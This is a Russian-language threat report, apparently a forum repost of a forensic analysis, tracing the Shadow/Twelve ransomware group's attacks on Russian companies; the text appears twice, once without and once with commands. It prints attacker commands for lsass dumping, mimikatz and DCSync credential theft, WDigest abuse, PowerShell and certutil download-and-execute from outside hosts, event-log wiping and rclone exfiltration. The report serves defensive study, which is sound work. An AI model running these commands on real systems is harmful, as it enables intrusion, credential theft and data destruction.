Эксперты Лаборатории цифровой криминалистики компании F.A.C.C.T.
В различных атаках Shadow получают первоначальный доступ через фишинговые рассылки или легитимные аутентификационные данные, купленные на теневых площадках, или добытые в атаках на подрядчиков. Кроме того, они комибинируют два этих метода, отправляя фишинг с внутренних аккаунтов внутри компании. Так же для проникновения на периметр организаций группировка экспулатирует уязвимости в публично доступных сервисах.
— RCE-уязвимости Atlassian Confluence (CVE-2023-22515, CVE-2023-22518);
— цепочку уязвимостей Zimbra (CVE-2019-9670, CVE-2019-9621);
— цепочку уязвимостей ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207);
— RCE-уязвимость JetBrains TeamCity (CVE-2024-27198).
Первоначально злоумышленники изучают окружение: содержимое доступных сетевых катологов, различных файлов, максимальную информацию о скомпрометированной учетной записи, о домене, в который она входит.
Далее Shadow выгружают конфиденциальную информацию из БД с помощью штатных утилит для различных СУБД или с помощью программы DBeaver. После извлечения данных происходит эксфильтрация данных на подконтрольный хост через буфер обмена или популярные файлообменники Mega[.]io , gofile[.]io ,dropmefiles[.]net.
После похищения части информации атакующие приступают к повышению привилегий и дальнейшему развитию атаки. В случае, если у них есть доступ к непривилегированным аккаунтам, они могут воспользоваться уязвимостями (CVE-2021-40449, CVE-2022-21882, CVE-2022-21999, CVE-2023-21746, CVE-2020-1472). Для эксплуатации последней уязвимости используется инструмент AutoZerologon. В другом случае, когда у группировки уже есть права локального администратора, для получения СИСТЕМЫ они используют утилиту PsExec:
Далее злоумышленники приступают к поиску и компрометации учетных записей привилегированных пользователей домена. Они извлекают аутентификационные данные с помощью утилиты ProcDump создавая дамп процесса lsass.exe (procdump.exe -accepteula -64 -ma lsass.exe 1.dmp) и используя скрипты Veeam-Get-Creds.ps1 и Get-GPPPassword.ps1. Для извлечения данных из дампа Shadow используют mimikatz
Для перемещения по инфраструктуре используются протоколы RDP, SSH, SMB, WinRM, DCOM и уязвимости CVE-2020-1472, CVE-2017-0144. В качестве инструментов злоумышленники используют: встроенный RDP-клиент Windows, командлеты PowerShell (Enter-PSSession , Invoke-Command), PuTTY, Impacket SMBExec и WMIExec, CrackMapExec.)
Осуществив перемещение на один из хостов группировка доставляет свои инструменты в каталоги Public% , %Public%\Temp , %systemroot%\Logs , %ProgramData% , %userprofile%\Desktop , %userprofile%\Downloads. Помимо использования портативных версий утилит, атакующие также устанавливают через powershell необходимое им ПО, например Google Chrome. Так же для перемещения используется скомпрометированные NTLM-хеши. Используя NTLM-хеш привилегированной учетной записи Shadow с помощью программы SecretsDump удаленно извлекают NTLM-хеши из базы данных Active Directory.
В одной из атак для извлечения аутентификационных данных с DC Shadow использует атаку DCSync. (mimikatz.exe “lsadump::dcsync /user:<redacted>”). В случаях перемещения на DC группировка создает копию БД AD домена через встроенную утилиту ntdsutil.
Далее для поиска рабочих станций привилегированных пользователей реализуется следующая техника: собираются события 1149 из журнала Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational с контроллеров домена
Затем с помощью программы для восстановления паролей XenAllPasswordPro и NTLM-хеша целевого пользователя извлекаются аутентификационные данные из веб-браузеров, клиентов электронной почты, мессенджеров, менеджеров загрузки, СУБД, хранилищ аутентификационных данных Windows, VPN клиентов и других источников. Так же в арсенале группировки есть утилита ff_graber для извлечения сохраненных паролей и сертификатов из профилей браузера Mozilla Firefox (ff.exe list_comps.txt c:\users\public\ff 200).
Когда злоумышленникам не удается получить данные в открытом виде они включает протокол WDigest на целевых системах и завершают сеансы пользователей, чтобы вынудить их снова ввести свой пароль в уже небезопасной конфигурации системы, затем извлекают его.
Если активность со стороны пользователей долго время отсутствует Shadow принудительно включает режим Restricted Admin на целевой системе и подключается к ней.
Одновременно с получением данных происходит углубленная разведка с помощью инструментов AdExplorer, PingCastle, Slitheris Network Discovery, fscan, SoftPerfect Network Scanner, ADRecon, PowerView.ps1, SA.ps1, adPEAS.
Для закрепления Shadow используют инструмент Cobint, устанавливая его в качестве службы Windows. Загрузка ВПО осуществляется с помощью powershell скриптов.
ngrok используется в качестве основного резервного канала доступа в скомпрометированную инфраструктуру. Исполняемый файл ngrok может быть доставлен с помощью утилиты certutil. Далее группировка маскирует доставленный файл под легитимные приложения (service.exe, netsync.exe, network.exe, ondrive.exe и др.). Для закрепления ngrok в системах Shadow используют задания планировщика Windows.
Shadow использует общий во всех атаках шаблон для планировщика в виде XML-файла, который доставляется через буфер обмена во время RDP сессии либо вручную через консоль планировщика.
На случай обнаружения злоумышленники инсталлируют в качестве службы ПО AnyDesk, которое доставляют с официального ресурса или через буфер обмена. Далее злоумышленники создают локальные или доменные учетные записи и добавляют из в группу пользователей удаленного рабочего стола и в список разрешенных для подключений по RDP, маскируя их под легитимные сервисные записи (kvcservice, svcveeam, veeam).
На Linux злоумышленники закрепляются через руткит Facefish, который прописывал путь к своей библиотеке /lib64/libs.so в файл /etc/ld.so.preload и перезапускал службы sshd.
Одним из главных приоритетов Shadow стало удаление загруженных ими инструментов и результатов их работы. Так, например они очищают записи ключа реестра HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client пользовательского реестра ntuser.dat, в котором хранится информация об успешных RDP подключения. Также они очищают журналы через wevtutil:
Кроме того, злоумышленники меняют правила файрволлов, настраивают списки исключений антивирусных продуктов, отключают и иногда удаляют их.
Для восстановления удаленной информации атакующие используют Recuva, GiliSoft Data Recovery и Wise Data Recovery. Также, Shadow собирают информацию об авторизованных сессиях мессенджера Telegram.
Эксфильтрация данных малого объема проводится злоумышленниками через буфер обмена во время активных RDP-сессий. Данные среднего объема могут загружаться на различные файлообменники (Mega[.]io , gofile[.]io , dropmefiles[.]net) при помощи веб-браузеров или RDP-сессий. Для эксфильтрации больших объемов информации используется ПО Rclone и протокол SFTP.
Заключительным периодом атаки является шифрование и в некоторых случаях уничтожение данных. Шифрование Windows сегмента начинается с распространения вредоносной политики домена, которая на всех системах в домене изменяет параметры службы WinRM (включает базовую аутентификацию, разрешает незашифрованный трафик и т. п.) и отключает Windows Defender, Windows Firewall, Phishing Filter Microsoft Edge, Windows SmartScreen и др. В некоторых случаях злоумышленники удаляли все доменные политики для нанесения максимального ущерба. Далее Shadow создает задачи на отключение модулей антивирусной защиты на контролируемых системах, удаляют резервные копии и заполняют дисковые пространства хранилищ нулями для невозможности восстановления. В качестве ransomware используется LockBit 3.
В отношении Unix-систем используется ransomware семейства Babuk. Для доставки используется ПО WinSCP, при помощи которой программа-вымогатель копируется в каталог /tmp атакуемой системы. После чего в контексте SSH-сессии ей назначается атрибут выполнения, а затем производится ее запуск
Ссылка скрыта от гостей
атаки преступного синдиката Shadow и их сообщников на российские компании. Обе независимые группировки — вымогатели Shadow и хактивисты Twelve — на самом деле являются частями одной и той же хак-группы. Злоумышленники преследовали разные цели: Shadow была мотивирована на финансовую выгоду, тогда как Twelve стремилась к полному разрушению ИТ-инфраструктуры своих жертв. Рассмотрим подробнее все этапы атаки группировки.Первоначальный доступ
В различных атаках Shadow получают первоначальный доступ через фишинговые рассылки или легитимные аутентификационные данные, купленные на теневых площадках, или добытые в атаках на подрядчиков. Кроме того, они комибинируют два этих метода, отправляя фишинг с внутренних аккаунтов внутри компании. Так же для проникновения на периметр организаций группировка экспулатирует уязвимости в публично доступных сервисах.
— RCE-уязвимости Atlassian Confluence (CVE-2023-22515, CVE-2023-22518);
— цепочку уязвимостей Zimbra (CVE-2019-9670, CVE-2019-9621);
— цепочку уязвимостей ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207);
— RCE-уязвимость JetBrains TeamCity (CVE-2024-27198).
Развитие в инфраструктуре
Первоначально злоумышленники изучают окружение: содержимое доступных сетевых катологов, различных файлов, максимальную информацию о скомпрометированной учетной записи, о домене, в который она входит.
whoamiwhoami > C:\temp\v8_F105_4a.txtnet user <redacted> /domainnet localgroup /domainnet group «Администраторы домена» /domainnltest /trusted_domainsnltest /dclist: <compromised_domain>Далее Shadow выгружают конфиденциальную информацию из БД с помощью штатных утилит для различных СУБД или с помощью программы DBeaver. После извлечения данных происходит эксфильтрация данных на подконтрольный хост через буфер обмена или популярные файлообменники Mega[.]io , gofile[.]io ,dropmefiles[.]net.
После похищения части информации атакующие приступают к повышению привилегий и дальнейшему развитию атаки. В случае, если у них есть доступ к непривилегированным аккаунтам, они могут воспользоваться уязвимостями (CVE-2021-40449, CVE-2022-21882, CVE-2022-21999, CVE-2023-21746, CVE-2020-1472). Для эксплуатации последней уязвимости используется инструмент AutoZerologon. В другом случае, когда у группировки уже есть права локального администратора, для получения СИСТЕМЫ они используют утилиту PsExec:
psexec.exe -i -s cmdДалее злоумышленники приступают к поиску и компрометации учетных записей привилегированных пользователей домена. Они извлекают аутентификационные данные с помощью утилиты ProcDump создавая дамп процесса lsass.exe (procdump.exe -accepteula -64 -ma lsass.exe 1.dmp) и используя скрипты Veeam-Get-Creds.ps1 и Get-GPPPassword.ps1. Для извлечения данных из дампа Shadow используют mimikatz
Код:
mimikatz.exe
-> sekurlsa::minidump 1.dmp
-> sekurlsa::logonPasswords fullДля перемещения по инфраструктуре используются протоколы RDP, SSH, SMB, WinRM, DCOM и уязвимости CVE-2020-1472, CVE-2017-0144. В качестве инструментов злоумышленники используют: встроенный RDP-клиент Windows, командлеты PowerShell (Enter-PSSession , Invoke-Command), PuTTY, Impacket SMBExec и WMIExec, CrackMapExec.)
Осуществив перемещение на один из хостов группировка доставляет свои инструменты в каталоги Public% , %Public%\Temp , %systemroot%\Logs , %ProgramData% , %userprofile%\Desktop , %userprofile%\Downloads. Помимо использования портативных версий утилит, атакующие также устанавливают через powershell необходимое им ПО, например Google Chrome. Так же для перемещения используется скомпрометированные NTLM-хеши. Используя NTLM-хеш привилегированной учетной записи Shadow с помощью программы SecretsDump удаленно извлекают NTLM-хеши из базы данных Active Directory.
secretsdump.exe -hashes aad3b435b51404eeaad3b435b51404ee:<redacted> -just-dcntlmdomain_redacted/login_redacted@<dcname_redacted> -outputfile ntlm-extractВ одной из атак для извлечения аутентификационных данных с DC Shadow использует атаку DCSync. (mimikatz.exe “lsadump::dcsync /user:<redacted>”). В случаях перемещения на DC группировка создает копию БД AD домена через встроенную утилиту ntdsutil.
powershell.exe ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full C:\Users\Public\Temp\log’ q qДалее для поиска рабочих станций привилегированных пользователей реализуется следующая техника: собираются события 1149 из журнала Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational с контроллеров домена
powershell.exe -ex bypass -f Get-RDPLogs.ps1 -ComputerName <redacted> > log.txt
Код:
Get-WinEvent «Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational» | ?{$_.ID -eq «1149»} | %{ New-Object PSObject -Property @{MachineName = $_.MachineName TimeCreated = $_.TimeCreatedUser = $_.Properties[0].Value Domain = $_.Properties[1].Value SourceIP = $_.Properties[2].Value } }Затем с помощью программы для восстановления паролей XenAllPasswordPro и NTLM-хеша целевого пользователя извлекаются аутентификационные данные из веб-браузеров, клиентов электронной почты, мессенджеров, менеджеров загрузки, СУБД, хранилищ аутентификационных данных Windows, VPN клиентов и других источников. Так же в арсенале группировки есть утилита ff_graber для извлечения сохраненных паролей и сертификатов из профилей браузера Mozilla Firefox (ff.exe list_comps.txt c:\users\public\ff 200).
Когда злоумышленникам не удается получить данные в открытом виде они включает протокол WDigest на целевых системах и завершают сеансы пользователей, чтобы вынудить их снова ввести свой пароль в уже небезопасной конфигурации системы, затем извлекают его.
Код:
psexec \\<redacted> cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
logoff <sessionID>Если активность со стороны пользователей долго время отсутствует Shadow принудительно включает режим Restricted Admin на целевой системе и подключается к ней.
Код:
psexec \\<redacted> cmd
New-ItemProperty -Path «HKLM:\System\CurrentControlSet\Control\Lsa» -Name «DisableRestrictedAdmin» -Value «0» -PropertyType DWORD -Force
Exit
mimikatz.exe
-> sekurlsa:: pth /user:<redacted> /domain:<redacted> /ntlm: <redacted> /run:»mstsc.exe /restrictedadmin»Разведка и изучение
Одновременно с получением данных происходит углубленная разведка с помощью инструментов AdExplorer, PingCastle, Slitheris Network Discovery, fscan, SoftPerfect Network Scanner, ADRecon, PowerView.ps1, SA.ps1, adPEAS.
Закрепление
Для закрепления Shadow используют инструмент Cobint, устанавливая его в качестве службы Windows. Загрузка ВПО осуществляется с помощью powershell скриптов.
powershell.exe -ep byp ass -w hidden -c iex ((New ObjectNet.WebClient).DownloadString(‘http://*’))powershell.exe -ex bypass -c Invoke-WebRequest http://... -OutFile C:\ProgramData\InternetExplorer\*.ps1ngrok используется в качестве основного резервного канала доступа в скомпрометированную инфраструктуру. Исполняемый файл ngrok может быть доставлен с помощью утилиты certutil. Далее группировка маскирует доставленный файл под легитимные приложения (service.exe, netsync.exe, network.exe, ondrive.exe и др.). Для закрепления ngrok в системах Shadow используют задания планировщика Windows.
certutil.exe -urlcache -split -f «https[:]//4707-89-37-173-22.ngrok-free.app/Xazb5p8khy/OneDrive.exe»Shadow использует общий во всех атаках шаблон для планировщика в виде XML-файла, который доставляется через буфер обмена во время RDP сессии либо вручную через консоль планировщика.
На случай обнаружения злоумышленники инсталлируют в качестве службы ПО AnyDesk, которое доставляют с официального ресурса или через буфер обмена. Далее злоумышленники создают локальные или доменные учетные записи и добавляют из в группу пользователей удаленного рабочего стола и в список разрешенных для подключений по RDP, маскируя их под легитимные сервисные записи (kvcservice, svcveeam, veeam).
На Linux злоумышленники закрепляются через руткит Facefish, который прописывал путь к своей библиотеке /lib64/libs.so в файл /etc/ld.so.preload и перезапускал службы sshd.
Уклонение от обнаружения
Одним из главных приоритетов Shadow стало удаление загруженных ими инструментов и результатов их работы. Так, например они очищают записи ключа реестра HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client пользовательского реестра ntuser.dat, в котором хранится информация об успешных RDP подключения. Также они очищают журналы через wevtutil:
cmd.exe /c for /F «tokens=*» %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl «%1»Кроме того, злоумышленники меняют правила файрволлов, настраивают списки исключений антивирусных продуктов, отключают и иногда удаляют их.
Эксфильтрация и импакт
Для восстановления удаленной информации атакующие используют Recuva, GiliSoft Data Recovery и Wise Data Recovery. Также, Shadow собирают информацию об авторизованных сессиях мессенджера Telegram.
Эксфильтрация данных малого объема проводится злоумышленниками через буфер обмена во время активных RDP-сессий. Данные среднего объема могут загружаться на различные файлообменники (Mega[.]io , gofile[.]io , dropmefiles[.]net) при помощи веб-браузеров или RDP-сессий. Для эксфильтрации больших объемов информации используется ПО Rclone и протокол SFTP.
rclone sync -i «Q:\Shares\ FinDep» <redacted>:/home/root/<redacted> /FinDep --log-level INFO --progress > dism.logЗаключительным периодом атаки является шифрование и в некоторых случаях уничтожение данных. Шифрование Windows сегмента начинается с распространения вредоносной политики домена, которая на всех системах в домене изменяет параметры службы WinRM (включает базовую аутентификацию, разрешает незашифрованный трафик и т. п.) и отключает Windows Defender, Windows Firewall, Phishing Filter Microsoft Edge, Windows SmartScreen и др. В некоторых случаях злоумышленники удаляли все доменные политики для нанесения максимального ущерба. Далее Shadow создает задачи на отключение модулей антивирусной защиты на контролируемых системах, удаляют резервные копии и заполняют дисковые пространства хранилищ нулями для невозможности восстановления. В качестве ransomware используется LockBit 3.
В отношении Unix-систем используется ransomware семейства Babuk. Для доставки используется ПО WinSCP, при помощи которой программа-вымогатель копируется в каталог /tmp атакуемой системы. После чего в контексте SSH-сессии ей назначается атрибут выполнения, а затем производится ее запуск
Последнее редактирование:
